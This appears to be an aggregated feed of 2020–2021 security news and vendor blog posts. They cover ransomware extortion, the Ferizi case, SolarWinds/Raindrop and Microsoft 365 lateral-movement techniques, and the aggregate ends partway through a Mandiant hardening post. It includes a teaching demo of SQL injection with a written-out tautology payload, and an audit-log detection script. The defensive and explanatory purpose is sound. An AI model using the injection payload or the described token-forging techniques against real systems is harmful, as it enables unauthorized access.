The post Security is everyone’s priority first appeared on IT World Canada.

MAZE Exfiltration Tactic Widely Adopted

New research by New Zealand company Emsisoft has found that a cyber-blackmail tactic first debuted by ransomware gang MAZE has been adopted by over a dozen other criminal cyber-gangs.

The internationally renowned security software company declared a ransomware crisis in the last month of 2019. Their latest ransomware report shows that this particular type of malware has had a huge impact on the United States in 2020.

Emsisoft threat analyst Brett Callow described the numbers in "The State of Ransomware in the US: Report and Statistics 2020" as "pretty grim."

At least 2,354 US governments, healthcare facilities, and schools were impacted by ransomware last year, including 113 federal, state, and municipal governments and agencies, 560 healthcare facilities, and 1,681 schools, colleges, and universities.

Researchers noted that the attacks "caused significant, and sometimes life-threatening, disruption: ambulances carrying emergency patients had to be redirected, cancer treatments were delayed, lab test results were inaccessible, hospital employees were furloughed and 911 services were interrupted."

In 2020, MAZE became the first ransomware group to be observed exfiltrating data from its victims and using the threat of publication as additional leverage to extort payment. 

"At the beginning of 2020, only the Maze group used this tactic," wrote researchers. "By the end of the year, at least 17 others had adopted it and were publishing stolen data on so-called leak sites."

According to a November report by Coveware, some ransomware gangs that exfiltrate data don't delete it, even after receiving a ransom from their victims. Coveware observed REvil (Sodinokibi) asking for a second ransom payment for stolen data it had already been paid to erase. 

Netwalker (Mailto) and Mespinoza (Pysa) were observed publishing exfiltrated data on dedicated leak-site portals despite receiving ransoms from their victims. 

Emsisoft found that in 2019 and in 2020, the same number of federal, state, county, and municipal governments and agencies were impacted by ransomware (113). 

"Of the 60 incidents that occurred in Q1 and Q2, data was stolen and released in only one case; it was, however, stolen and released in 23 of the 53 incidents that occurred in Q3 and Q4," they wrote.

New Charges Derail COVID Release for Hacker Who Aided ISIS

A hacker serving a 20-year sentence for stealing personal data on 1,300 U.S. military and government employees and giving it to an Islamic State hacker group in 2015 has been charged once again with fraud and identity theft. The new charges have derailed plans to deport him under compassionate release because of the COVID-19 pandemic.

Ardit Ferizi, a 25-year-old citizen of Kosovo, was slated to be sent home earlier this month after a federal judge signed an order commuting his sentence to time served. The release was granted in part due to Ferizi’s 2018 diagnosis of asthma, as well as a COVID outbreak at the facility where he was housed in 2020.

But while Ferizi was in quarantine awaiting deportation the Justice Department unsealed new charges against him, saying he’d conspired from prison with associates on the outside to access stolen data and launder the bitcoin proceeds of his previous crimes.

In the years leading up to his arrest, Ferizi was the administrator of a cybercrime forum called Pentagon Crew. He also served as the leader of an ethnic Albanian group of hackers from Kosovo known as Kosova Hacker’s Security (KHS), which focused on compromising government and private websites in Israel, Serbia, Greece, Ukraine and the United States.

The Pentagon Crew forum founded by Ferizi.

In December 2015, Ferizi was apprehended in Malaysia and extradited to the United States. In January 2016, Ferizi pleaded guilty to providing material support to a terrorist group and to unauthorized access. He admitted to hacking a U.S.-based e-commerce company, stealing personal and financial data on 1,300 government employees, and providing the data to an Islamic State hacking group.

Ferizi gave the purloined data to Junaid “Trick” Hussain, a 21-year-old hacker and recruiter for ISIS who published it in August 2015 as part of a directive that ISIS supporters kill the named U.S. military members and government employees. Later that month, Hussain was reportedly killed by a drone strike in Syria.

The government says Ferizi and his associates made money by hacking PayPal and other financial accounts, and through pornography sites he allegedly set up mainly to steal personal and financial data from visitors.

Junaid Hussain’s Twitter profile photo.

Between 2015 and 2019, Ferizi was imprisoned at a facility in Illinois that housed several other notable convicts. For example, prosecutors allege that Ferizi was an associate of Mahmud “Red” Abouhalima, who was serving a 240 year sentence at the prison for his role in the 1993 World Trade Center bombing.

Another inmate incarcerated at the same facility was Shawn Bridges, a former U.S. Secret Service agent serving almost eight years for stealing $820,000 worth of bitcoin from online drug dealers while investigating the hidden underground website Silk Road. Prosecutors say Ferizi and Bridges discussed ways to hide their bitcoin.

The information about Ferizi’s inmate friends came via a tip from another convict, who told the FBI that Ferizi was allegedly using his access to the prison’s email system to share email and bitcoin account passwords with family members back home.

The Justice Department said subpoenas served on Ferizi’s email accounts and interviews with his associates show Ferizi’s brother in Kosovo used the information to “liquidate the proceeds of Ferizi’s previous criminal hacking activities.”

[Side note: It may be little more than a coincidence, but my PayPal account was hacked in Dec. 2015 by criminals who social engineered PayPal employees over the phone into changing my password and bypassing multi-factor authentication. The hackers attempted to send my balance to an account tied to Hussain, but the transfer never went through.]

Ferizi is being tried in California, but has not yet had an initial appearance in court. He’s charged with one count of aggravated identity theft and one count of wire fraud. If convicted of wire fraud, he faces a maximum penalty of 20 years in prison and a fine of $250,000. If convicted of aggravated identity theft, he faces a mandatory penalty of 2 years in prison in addition to the punishment imposed for a wire fraud conviction.

Cloud Mailbox Defense: End Users Share the Product Highlights Driving Their Success

This blog was written & authored by Rob Tappenden, Technical Marketing Engineering Leader at Cisco

Simplicity. This was the key fundamental principle of Cloud Mailbox Defense that we introduced in our earlier blogs. So how did the first customers and partners to try Cloud Mailbox Defense (CMD) think we did? “We have tested dozens of solutions. Cloud Mailbox Defense is the first solution that is ‘as easy as it claims to be’. There are no hidden architecture requirements, no additional configuration step and no misleading claims” said Anthony Gates, EVP/GM Rhino Networks.

In case you are not familiar with Cloud Mailbox Defense (I’d encourage you to read through some of my earlier blogs), this is our new supplementary security solution that allows you to take command of your Microsoft 365 mailboxes. It’s a cloud native solution focused on three core principles.

Cloud Mailbox Defense capabilities

Now simplicity may be the cornerstone of Cloud Mailbox Defense, but can a security product be too simple to be effective? After all, as more and more email moves to the cloud, some Gartner clients “report dissatisfaction with natively available capabilities” of their cloud email providers. That’s why it’s critical to blend this simplicity with 20 years of email security experience and the power of Cisco’s Talos threat intelligence, to give you a secure outcome you can see across all of your messages in your Microsoft 365 domain. To validate this, we have been running approximately three quarters of a million customer and partner emails through our solution per day to allow them to tell us whether we have realized our principles.

Their verdict?

Just like simplicity, once again we’ve delivered. According to Craig Ouzounian from Chevron Corporation, “You get a full picture, that east-west visibility that we don’t have today.” This comprehensive visibility is combined with the power of Cloud Mailbox Defense’s cloud native search and triage. Brian Kang from SecurView stated, “I don’t even bother to run a message trace in Microsoft, I just do it right here [in CMD].” CMD’s value isn’t only in its ability to provide additional security context, it also reduces administrative overhead. Harry Singh from VOX Network Solutions highlighted that, “The speed and ease of use, compared with the Microsoft one, is a huge improvement. If I go into the Microsoft Advanced Threat Protection search, it takes forever. I use PowerShell because the search is so slow, it’s work. I can’t just do it on the ATP side.”

Visibility. Simplicity. Integration. Delivered on Microsoft 365 email. We said it and we meant it. That’s the Cisco Mailbox Defense reality.

Naturally we’re thrilled about the feedback we’re receiving from our customers and partners, but rest assured we’re not done. Cloud email expectations and the threat landscape continues to evolve at a phenomenal pace. Cloud Mailbox Defense has an exciting roadmap ahead of it, leveraging the power of the SecureX platform and the whole Cisco Secure portfolio to be the premier Cloud Email Supplementary Security product of choice for your needs today and the future.

Start your free 30-day trial of Cloud Mailbox Defense today and check out www.cisco.com/go/cmd and the At-A-Glance for more details about Cloud Mailbox Defense.

Suspicious Vaccine-Related Domains Triple

The number of suspicious domains that feature the word "vaccine" in their title increased by almost 100% in the month after the first Pfizer COVID-19 vaccine was given outside of a clinical trial.

British grandmother Margaret Keenan became the first person in the world to receive the vaccine on December 8, 2020, a week before her 91st birthday. 

New research by American cybersecurity software company Webroot observed that from December 8 through January 6, there was a 94.8% increase in suspicious domain names using "vaccine" compared with the previous 30 days.

When compared with the month of March 2020, the total use of the word "vaccine" within suspicious domain names between December and January 6 was found to have increased by 336%.

“As 2021 brings the first mass vaccination programs to fight COVID-19, we’re already seeing cybercriminals exploiting the publicity and anticipation surrounding these to target businesses and consumers in phishing and domain spoofing attacks," said Nick Emanuel, senior director of product at Webroot.

"Scams using keywords based on emotive subjects concerning medical safety and the pandemic are always going to be more effective, especially when they’re in the public interest."

Webroot’s Real-Time Anti-Phishing protection system detected a rise in malicious URLs using other words related to the pandemic.

Over 4,500 new suspicious domains were found, which contained a combination of words relating to "COVID-19," "Corona," "Vaccine," "Cure COVID," and others.

The word "vaccine" was specifically included in the title of 934 domains, while misspellings of "vaccine" cropped up in 611 more. 

"COVID" was in the title of 2,295 suspicious domains, and "Test" or "Testing" appeared in the title of 622 domains.

Threat actors also appeared to be using public interest in travel restrictions as a phishing lure. Among the suspicious domain titles flagged by researchers were "COVID Validator," "Testing Update," "COVID Travelcard," and "Private Vaccine."

"For individuals, defending against these kinds of attacks should involve security awareness training and remaining vigilant in scrutinising the types of emails they receive," said Emanuel. 

"This should also be underpinned by cybersecurity technology such as email filtering, anti-virus protection, and strong password policies.”

Retail and Hospitality Sector Has Impressive Fix Rate, but Room to Improve

Over the past year, the retail and hospitality industries have been forced to adapt to the “new normal.” Since lockdowns and health concerns have prevented or dissuaded in-person shopping or dining, the new normal has been e-commerce. Smaller businesses not equipped for the increase in e-commerce have had to undergo rapid digital transformation in order to stay afloat. But, unfortunately, e-commerce was not the only thing to increase in 2020. Cyberattackers have been taking advantage of the influx of digital activity.

This is especially concerning because, according to our recent State of Software Security (SOSS) report, 76 percent of applications in the retail and hospitality sector have a security vulnerability and 26 percent have high-severity security vulnerabilities.

But, on a positive note, our SOSS findings also revealed that when compared to other industries, retail and hospitality have the second-best fix rate and the best median time to remediate security flaws. This means that even though the industries might have a higher than usual number of flaws, they are quick to act and remediate those flaws. As Chris Eng, Chief Research Officer at Veracode explains, “If retailers are constantly having to push out code containing business logic to support new promotions, that might account for the fix times.”

Retail and hospitality

The SOSS report also examined how the “nature” of applications and how we “nurture” them contribute to the time it takes to close out a security flaw. We found that the “nature” of applications (like organization or application size, application age, or flaw density) can affect how long it takes to remediate a security flaw. But, taking steps to “nurture” the security of applications (like using multiple application security (AppSec) testing types, scanning frequently and steadily, and utilizing APIs) can also influence how long it takes to remediate security flaws.

For the retail and hospitality industries, we found that they have a low flaw density relative to other sectors, but the applications tend to be old and larger. We also found that the sector is not consistently using DevSecOps best practices like scanning frequently in an automated way. If developers start following the best practices regularly, the retail and hospitality industries can remediate flaws and chip away at security debt faster.

Retail and hospitality nature vs nurture chart

Flaws that the retail and hospitality sector should keep a close eye on include encapsulation, SQL injection, and credential management issues. These flaw types seem to be more prevalent in the retail and hospitality sector compared to other industries, and they can lead to a serious breach. In fact, injection flaws are considered by OWASP Top 10 to be the number one, most critical security risk to web applications.
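To make the SQL injection flaw mentioned above concrete, here is an added example (not code from the Veracode report or any retail application) that puts a vulnerable account lookup beside its parameterized fix and runs the same inputs through both. The `customers` table and its rows are constructed for the demonstration, and the lookup functions are hypothetical names chosen for this example.

```python
import sqlite3

# Constructed sample data: a tiny customer table of the kind a retail site's
# account lookup might query. Not taken from the report.
SAMPLE_ROWS = [
    ("alice", "alice@example.com"),
    ("bob", "bob@example.com"),
    ("carol", "carol@example.com"),
]


def _connect():
    """Build an in-memory SQLite database holding the constructed rows."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE customers (username TEXT, email TEXT)")
    conn.executemany("INSERT INTO customers VALUES (?, ?)", SAMPLE_ROWS)
    return conn


def lookup_vulnerable(conn, username):
    """The flaw: user input is spliced into the SQL text, so the input can
    change the structure of the query rather than only the value compared."""
    sql = "SELECT username, email FROM customers WHERE username = '%s'" % username
    return conn.execute(sql).fetchall()


def lookup_parameterized(conn, username):
    """The fix: the SQL text is fixed and the value is bound separately, so
    whatever the input contains is compared as one string literal."""
    sql = "SELECT username, email FROM customers WHERE username = ?"
    return conn.execute(sql, (username,)).fetchall()


def demo():
    """Run a benign and a malformed input through both lookups.

    The malformed input (constructed for this example) closes the quoted
    literal and appends an always-true condition; it is the classic way
    string-built queries fail, and the comparison shows why parameter
    binding is the remediation a code reviewer should ask for."""
    conn = _connect()
    benign = "alice"
    malformed = "' OR '1'='1"
    return {
        "vulnerable_benign": lookup_vulnerable(conn, benign),
        "vulnerable_malformed": lookup_vulnerable(conn, malformed),
        "parameterized_benign": lookup_parameterized(conn, benign),
        "parameterized_malformed": lookup_parameterized(conn, malformed),
    }


if __name__ == "__main__":
    for name, rows in demo().items():
        print(f"{name}: {len(rows)} row(s) -> {rows}")
```

The vulnerable lookup returns every customer for the malformed input because the condition becomes `username = '' OR '1'='1'`; the parameterized lookup returns nothing, since the whole string is treated as a username that does not exist. Static analysis tools of the kind the SOSS report measures flag the first pattern (string formatting feeding an execute call) as the injection sink; the fix is always to bind, never to escape by hand.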

For more information on software security trends in the retail and hospitality industries, check out The State of Software Security Industry Snapshot.


Atlanta Synagogue Reports Cyber-Attack

Atlanta Synagogue Reports Cyber-Attack

An annual religious service held in Atlanta in honor of Martin Luther King Jr. Day was disrupted by a cyber-attack. 

Threat actors reportedly targeted a Shabbat service that was being broadcast live over the internet from Atlanta synagogue The Temple on January 15. The attack occurred as US Senator-elect Raphael Warnock, the pastor at Martin Luther King Jr.’s historic Ebenezer Baptist Church in Atlanta, was delivering a sermon.

People attempting to watch the service live via the Temple's website were unable to access it, according to a letter penned by the synagogue's president, Kent Alexander.

Writing to the congregation on Saturday, Alexander said: “To the many of you who tried to log on through the Temple website but could not, and missed the service, we apologize and want to offer an explanation.

“Our website service provider informed our executive director, Mark Jacobson, last night that ‘malicious user agents’ had continuously loaded the Temple website with the objective of shutting it down.” 

Alexander did not name the service provider but added that he had been told that the attack was the "largest-ever attack affecting the provider's network of client synagogues" and that websites across the United States had also been blocked.

"Eventually, access was restored for all, but The Temple was last," the director wrote. "Our site was down for over an hour into the service."

The incident is currently under investigation by the authorities. Alexander theorized that the attack was inspired by religious and racial bigotry.  

After highlighting that Warnock will soon become Georgia's first African American senator, Alexander wrote: "Presumably, The Temple was singled out by a racist and anti-Semitic group or individual bent on silencing our joint Temple-Ebenezer Baptist Church MLK Jr. Shabbat."

The Temple was founded in 1867 and is located in the city's midtown. An annual Martin Luther King Jr. Day Shabbat service has been hosted there for over a decade. 

In 1958, the Temple's north entrance was bombed by the "Confederate Underground" in an incident denounced by then President Dwight Eisenhower. The bomb, made using 50 sticks of dynamite, caused damage valued at $750k today.

Researchers flag fourth piece of malware seen in SolarWinds hack and detail how Microsoft 365 got exploited

Two security vendors issued more details about the SolarWinds hack and abuse of its Orion network management platform.

Symantec says the list of malware pieces that could be delivered to victims of the SolarWinds Orion supply chain hack has grown to four. It found the new malware, a backdoor which it dubs Raindrop, was used against a select number of victims that were of interest to the attackers.

Raindrop is a loader that delivers a payload of the Cobalt Strike threat emulation software often used by infosec teams for penetration tests. It joins other malware used by the attackers, including the initial backdoor called Sunburst/Solorigate and another backdoor, deposited later, called Teardrop. The malware used to get into the SolarWinds build environment is called Sunspot.

Raindrop, Symantec says, is very similar to Teardrop. But while the initial Sunburst backdoor delivered Teardrop, Raindrop appears to be used for spreading across the victim’s network. The security firm also notes that it has seen no evidence of Raindrop being delivered directly by Sunburst to date. Instead, it appears elsewhere on networks where Sunburst has already compromised at least one computer.

The attack by a threat group FireEye calls UNC2452 — believed by the U.S. to be of Russian origin — compromised updates downloaded by some 18,000 users of the Orion network management platform between March and August 2020. SolarWinds has evidence that the attack on its update mechanism started as early as the fall of 2019.

FireEye today also issued a report saying that the UNC2452 group used its access to on-premises networks to access victims’ Microsoft 365 environment during certain attacks. In addition to issuing a detailed paper describing these attacks and how to harden Microsoft environments, FireEye released a free tool on GitHub named Azure AD Investigator. The tool is meant to help organizations determine if the SolarWinds hackers got into Microsoft 365.

In its report, Symantec describes how Raindrop was used against one victim. In early July 2020, Sunburst was installed through the SolarWinds Orion update, compromising two computers. The following day, Teardrop was added to one of them. That computer was found to have an Active Directory query tool and a credential dumper designed specifically for Orion databases. The credential dumper was similar to, but not the same as, the open-source Solarflare tool.

Eleven days later, on a third victim computer in the organization, where no previous malicious activity had been observed, a copy of the previously unseen Raindrop was installed under the name bproxy.dll. This computer was running computer access and management software. The attackers could have used this software to access any of the computers in the compromised organization.

One hour later, the Raindrop malware installed an additional file called “7z.dll”. Symantec was unable to retrieve this file because, within hours, a legitimate version of 7zip was used to extract a copy of what appeared to be Directory Services Internals (DSInternals) onto the computer. DSInternals is a legitimate tool that can be used for querying Active Directory servers and retrieving data, typically passwords, keys, or password hashes.

A pattern emerges

A second victim organization seen by Symantec had the Raindrop loader in late May. Several days later, PowerShell commands were executed on that computer, attempting to execute further instances of Raindrop on additional computers in the organization.

In a third victim, Symantec says Raindrop was used to install a version of Cobalt Strike that didn’t have an HTTP-based command and control server. Instead, it was rather configured to use a network pipe over Windows SMB (Server Message Block) protocol. Symantec theorizes the victim’s computer did not have direct access to the internet, so command and control was routed through another computer on the local network. Otherwise, the three Raindrop samples seen by Symantec used HTTPS communication.

The report outlines how UNC2452 and other threat actors moved laterally to the Microsoft 365 cloud using a combination of four primary techniques:

  1. Steal the Active Directory Federation Services (AD FS) token-signing certificate and use it to forge tokens for arbitrary users (sometimes described as Golden SAML). This would allow the attacker to authenticate into a federated resource provider (such as Microsoft 365) as any user, without the need for that user’s password or their corresponding multi-factor authentication (MFA) mechanism.
  2. Modify or add trusted domains in Azure AD to add a new federated Identity Provider (IdP) that the attacker controls. This would allow the attacker to forge tokens for arbitrary users and has been described as an Azure AD backdoor.
  3. Compromise the credentials of on-premises user accounts that are synchronized to Microsoft 365 that have high privileged directory roles, such as Global Administrator or Application Administrator.
  4. Backdoor an existing Microsoft 365 application by adding a new application or service principal credential to use the legitimate permissions assigned to the application, such as the ability to read email, send email as an arbitrary user, access user calendars, etc.

“It is important to note that there is no formal security boundary between on-premises networks and cloud services provided by Microsoft 365,” FireEye warned. “If an organization discovers evidence of targeted threat actor activity in their on-premises network, a thorough review of the cloud environment is often necessary as well.”
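Three of the four techniques listed above (a new federated IdP on a domain, a privileged directory role granted to a synced account, and a credential added to an existing application or service principal) leave entries in the Azure AD audit log. The following is an added example, not part of FireEye's report or its Azure AD Investigator tool, that scans exported audit records for those operations. The records are constructed for the example; the operation names (`Set federation settings on domain`, `Set domain authentication`, `Add service principal credentials`, `Add member to role`) and the `Role.DisplayName` modified-property layout follow the audit log activity names as I know them, and should be confirmed against your own tenant's export before the mapping is relied on.

```python
import json

# Constructed Azure AD audit log records (not from the report or any real
# tenant), one JSON object per line in the shape of an exported audit event.
# The exact schema is an assumption for this example.
SAMPLE_AUDIT_LOG = """
{"activityDateTime": "2020-07-14T02:11:09Z", "operationName": "Set federation settings on domain", "initiatedBy": "svc-sync@example.test", "targetResources": [{"displayName": "example.test", "type": "Domain"}]}
{"activityDateTime": "2020-07-14T02:15:40Z", "operationName": "Add service principal credentials", "initiatedBy": "svc-sync@example.test", "targetResources": [{"displayName": "Mail Connector App", "type": "ServicePrincipal"}]}
{"activityDateTime": "2020-07-14T09:00:00Z", "operationName": "Update user", "initiatedBy": "helpdesk@example.test", "targetResources": [{"displayName": "bob@example.test", "type": "User"}]}
{"activityDateTime": "2020-07-15T11:30:00Z", "operationName": "Add member to role", "initiatedBy": "svc-sync@example.test", "targetResources": [{"displayName": "svc-sync@example.test", "type": "User", "modifiedProperties": [{"displayName": "Role.DisplayName", "newValue": "Global Administrator"}]}]}
{"activityDateTime": "2020-07-15T12:00:00Z", "operationName": "Add member to role", "initiatedBy": "helpdesk@example.test", "targetResources": [{"displayName": "carol@example.test", "type": "User", "modifiedProperties": [{"displayName": "Role.DisplayName", "newValue": "Guest Inviter"}]}]}
"""

# Audit operations mapped to the techniques in FireEye's list. Operation
# names are assumed Azure AD activity names; verify them in your tenant.
WATCHED_OPERATIONS = {
    "Set federation settings on domain": "Technique 2: federated IdP added or changed on a domain",
    "Set domain authentication": "Technique 2: domain switched between managed and federated",
    "Add service principal credentials": "Technique 4: credential added to an existing app or service principal",
    "Add member to role": "Technique 3: privileged directory role granted",
}

# Roles named on the page; extend with whatever your tenant treats as privileged.
PRIVILEGED_ROLES = {"Global Administrator", "Application Administrator"}


def parse_records(text):
    """Parse newline-delimited JSON audit records, skipping blank lines."""
    records = []
    for line in text.splitlines():
        line = line.strip()
        if line:
            records.append(json.loads(line))
    return records


def role_names(record):
    """Collect role display names from a record's modified properties.
    Real exports often wrap newValue in an extra pair of quotes, so strip them."""
    names = set()
    for target in record.get("targetResources", []):
        for prop in target.get("modifiedProperties", []):
            if prop.get("displayName") == "Role.DisplayName":
                names.add(prop.get("newValue", "").strip('"'))
    return names


def find_suspicious(records):
    """Return the records that match a watched operation.

    Role grants are only reported when the role is privileged; routine
    role changes are left out so the output stays reviewable."""
    findings = []
    for rec in records:
        op = rec.get("operationName")
        if op not in WATCHED_OPERATIONS:
            continue
        if op == "Add member to role" and not (role_names(rec) & PRIVILEGED_ROLES):
            continue
        findings.append({
            "time": rec.get("activityDateTime"),
            "actor": rec.get("initiatedBy"),
            "operation": op,
            "targets": [t.get("displayName") for t in rec.get("targetResources", [])],
            "why": WATCHED_OPERATIONS[op],
        })
    return findings


if __name__ == "__main__":
    for f in find_suspicious(parse_records(SAMPLE_AUDIT_LOG)):
        print(f"{f['time']} {f['actor']} {f['operation']} -> {f['targets']}: {f['why']}")
```

Run against the constructed log, the script reports the federation change, the new service principal credential and the Global Administrator grant, all initiated by the same synchronization account, and ignores the routine user update and the non-privileged role grant. Technique 1 (a forged token from a stolen AD FS signing certificate) is not visible to this scan, because the forged token arrives as an apparently legitimate sign-in; catching it means correlating Microsoft 365 sign-ins with AD FS's own authentication logs, which is outside what this example covers.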

The post Researchers flag fourth piece of malware seen in SolarWinds hack and detail how Microsoft 365 got exploited first appeared on IT World Canada.

How IT leaders are securing identities with Zero Trust

The past twelve months have been a remarkable time of digital transformation as organizations, and especially digital security teams, adapt to working remotely and shifting business operations. IT leaders everywhere turned to Zero Trust approaches to alleviate the challenges of enabling and securing remote work. Using Zero Trust to secure users, data, and devices (wherever they may be) has changed from optional to a business imperative overnight.

In this short report, we surveyed IT leaders around the world to determine how they’re implementing Zero Trust practices to protect their identities and ensure their employees have secure access to resources.

A clickable link to the full PDF infographic to the Zero Trust whitepaper

  1. Most IT leaders are already using Zero Trust practices with their identity management solutions. While the majority of IT leaders have already implemented Zero Trust practices into their identity and access solution, only a minority have moved on to more advanced controls that utilize automation and AI-based threat analysis.
  2. Multi-factor authentication (MFA) and Single Sign-On (SSO) are the most common. Additionally, a majority are analyzing risk before granting access—a critical proactive step to preventing unauthorized access to corporate resources.
  3. Identities and devices are the top priority for most organizations. With employees working outside the corporate network and increasingly using personal devices, this is no surprise. However, surprisingly, the majority of IT leaders do not rate identities as the most mature component in their Zero Trust strategy.
  4. Zero Trust is still in infancy. Despite substantial growth in Zero Trust efforts over the past twelve months, only one in ten IT leaders report feeling very confident in their Zero Trust identity management roadmap.

Read the full report for more details.

If you’re looking for how to help prevent endpoints from being the weakest link in your security strategy, check out our Zero Trust deployment guidance for identities.

To learn more about Microsoft Security solutions visit our website.  Bookmark the Security blog to keep up with our expert coverage on security matters. Also, follow us at @MSFTSecurity for the latest news and updates on cybersecurity.

The post How IT leaders are securing identities with Zero Trust appeared first on Microsoft Security.

Desktops in the Data Center: Establishing ground rules for VDI

Since the earliest days of computing, we’ve endeavored to provide users with efficient, secure access to the critical applications which power the business.

From those early mainframe applications being accessed from hard-wired dumb terminals to the modern cloud-based application architectures of today, accessible to any user, from anywhere, on any device, we’ve witnessed the changing technology landscape deliver monumental gains in user productivity and flexibility.  With today’s workforce being increasingly remote, the delivery of secure, remote access to corporate IT resources and applications is more important than ever.

Although the remote access VPN has been dutifully providing secure, remote access for many years now, the advantages of centrally administering and securing the user desktop through Virtual Desktop Infrastructure (VDI) are driving rapid growth in adoption.  With options including hosting of the virtual desktop directly in the data center as VDI or in the public cloud as Desktop-as-a-Service (DaaS), organizations can quickly scale the environment to meet business demand in a rapidly changing world.

Allowing users to access a managed desktop instance from any personal laptop or mobile device, with direct access to their applications provides cost efficiencies and great flexibility with lower bandwidth consumption…. and it’s more secure, right?  Well, not so fast!

Considering the Risks

Although addressing some of the key challenges in enabling a remote workforce, VDI introduces a whole new set of considerations for IT security.  After all, we’ve spent years keeping users OUT of the data center…. and now with VDI, the user desktop itself now resides on a virtual machine, hosted directly inside the data center or cloud, right inside the perimeter security which is there to protect the organization’s most critical assets. The data!

This raises some important questions around how we can secure these environments and address some of these new risks.

  • Who is connecting remotely to the virtual desktop?
  • Which applications are being accessed from the virtual desktops?
  • Can virtual desktops communicate with each other?
  • What else can the virtual desktop gain access to outside of traditional apps?
  • Can the virtual desktop in any way open a reverse tunnel or proxy out to the Internet?
  • What is the security posture of the remote user device?
  • If the remote device is infected by virus or malware, is there any possible way that might infect the virtual desktop?
  • If the virtual desktop itself is infected by virus or malware, could an attacker access or infect other desktops, application servers, databases, etc.? Are you sure?

With VDI solutions today ranging from traditional on-premises solutions from Citrix and VMware to cloud offered services with Windows Virtual Desktop from Azure and Amazon Workspaces from AWS, there are differing approaches to the delivery of a common foundation for secure authentication, transport and endpoint control.  What is lacking however, is the ability to address some of the key fundamentals for a Zero Trust approach to user and application security across the multiple environments and vendors that make up most IT landscapes today.

How can Cisco Secure Workload (Tetration) help?

Cisco Secure Workload (Tetration) provides zero trust segmentation for VDI endpoints AND applications.  Founded on a least-privilege access model, this allows the administrator to centrally define and enforce a dynamic segmentation policy to each and every desktop instance and application workload.  Requiring no infrastructure changes and supporting any data center or cloud environment, this allows for a more flexible, scalable approach to address critical security concerns, today!

Establishing Control for Virtual Desktops

With Secure Workload, administrators can enforce a dynamic allow-list policy which allows users to access a defined set of applications and resources, while restricting any other connectivity.  Virtual desktops are typically connected to a shared virtual network, leaving a wide-open attack surface for lateral movement or malware propagation so this policy provides an immediate benefit in restriction of desktop to desktop communication.

This flexible policy allows rules to be defined based on context, whether identifying a specific desktop group/pool, application workloads or vulnerable machines, providing simplicity in administration and the flexibility to adapt to a changing environment without further modification.

  • Do your VDI instances really need to communicate with one another?

With a single policy rule, Secure Workload can enforce a desktop isolation policy to restrict communication between desktop instances without impacting critical services and application access.  This simple step will immediately block malware propagation and restrict visibility and lateral movement between desktops.

Figure 1: Deny policy for virtual desktop isolation

Figure 2: Lateral communication between desktops blocked (inbound and outbound)

  • Want to permit only a specific user group access to your highly sensitive HR application?

Secure Workload will identify the desktop instances and application workloads by context, continuously refreshing the allow-list policy rules to permit this communication as users log in and out of their virtual desktops and as the application workloads evolve.

Figure 3: Context based application access control

  • Need full visibility of which applications are being accessed, how and when?

Tetration not only enforces the allow-list policy to protect your assets, but also records flow data from every communication, ensuring continuous near-real-time compliance monitoring of traffic to identify malicious or anomalous behaviors.

  • Need to meet segmentation requirements for regulatory compliance?

Natural language policy definition based on dynamic labels and annotations ensures traffic complies with regulatory policy constraints from one well-defined policy intent.

  • Require the ability to automatically quarantine vulnerable virtual desktops or application workloads to protect against exploit?

Tetration natively detects vulnerable software packages to apply automated policy controls which only apply until remediation.

All offered from SaaS, this can be achieved without any change to existing infrastructure, with distributed enforcement at scale from virtual desktops to application workloads for end to end protection.

Ready to get started?  Find out more about Cisco Secure Workload

Researchers Discover Raindrop — 4th Malware Linked to the SolarWinds Attack

Cybersecurity researchers have unearthed a fourth new malware strain—designed to spread the malware onto other computers in victims' networks—which was deployed as part of the SolarWinds supply chain attack disclosed late last year. Dubbed "Raindrop" by Broadcom-owned Symantec, the malware joins the likes of other malicious implants such as Sunspot, Sunburst (or Solorigate), and Teardrop that

Out today: Defending against critical threats: A 12 month roundup

Inside, we take a retrospective look at cyber threats, and how they have evolved in the last 12 months. In something a little different to our previous reports, we’ve designed this in a magazine style format to include both interviews with security experts, and research driven features.

Our intention is to help inform strategic decision-making, as organizations prepare for threats they may encounter in the future. 

As a couple of callouts, we’ve included articles that address the ways cyber criminals sought to take advantage of the COVID-19 pandemic, be it through phishing campaigns, leveraging the great migration to remote work, or even going after health care organizations themselves.

Our interview with Esmond Kane, CISO for Steward Health Care, also shines a light on how COVID-19 impacted those on the security front line. 

In other topics, we’ve seen a large evolution in ransomware over the past year. Edmund Brumaghin, threat researcher for Cisco Talos, has pulled together some terrific research on Big Game Hunting attacks. This is when cyber criminals seek to monopolize a ransomware deployment by targeting backup systems, domain controllers, and other business-critical servers during a “post-compromise” phase. 

Our cover feature is the topic of election security. Cisco Talos spent four years conducting hands-on research into this field, and within this publication we have an interview with Matt Olney, Director of Talos threat intelligence and interdiction (who led this research), to capture his thoughts post-election. 

As our team were pulling this magazine together, what really struck me was that the topics illustrate how cyber threats impact our lives on a human level, from threats against our democracy, to our healthcare, to the organizations we work within. 

I hope you enjoy the read.

Click to read ‘Defending against critical threats: A 12 month roundup’

For more on these threat topics, take a listen to the latest episode of the Security Stories podcast.

Ben Nahorney, (my co-editor for the magazine), and I are joined live by Edmund Brumaghin to learn more about big game hunting attacks. Plus, we have the full interview with Esmond Kane to hear more about his experiences leading security on the front line of healthcare.

Listen below, or on Apple Podcasts, Spotify, Google Podcasts, or wherever you normally get your podcasts from.


Remediation and Hardening Strategies for Microsoft 365 to Defend Against UNC2452

In December 2020, FireEye uncovered and publicly disclosed a widespread attacker campaign that is being tracked as UNC2452. In some, but not all, of the intrusions associated with this campaign where Mandiant has visibility, the attacker used their access to on-premises networks to gain unauthorized access to the victim’s Microsoft 365 environment.

Goals and Objectives

Methodologies that UNC2452 and other threat actors have used to move laterally from on-premises networks to the Microsoft 365 cloud have been detailed in our white paper, Remediation and Hardening Strategies for Microsoft 365 to Defend Against UNC2452. The paper also discusses how organizations can proactively harden their environments and remediate environments where similar techniques have been observed.

Mandiant is releasing an auditing script, Azure AD Investigator, through its GitHub repository that organizations can use to check their Microsoft 365 tenants for indicators of some of the techniques used by UNC2452. The script will alert administrators and security practitioners to artifacts that may require further review to determine if they are truly malicious or part of legitimate activity. Many of the attacker techniques detailed in the white paper are dual-use in nature—they can be used by threat actors but also by legitimate tools. Therefore, a detailed review for specific configuration parameters may be warranted, including correlating and verifying that configurations are aligned with authorized and expected activities.

Attacker Tactics, Techniques and Procedures (TTPs)

Mandiant has observed UNC2452 and other threat actors moving laterally to the Microsoft 365 cloud using a combination of four primary techniques:

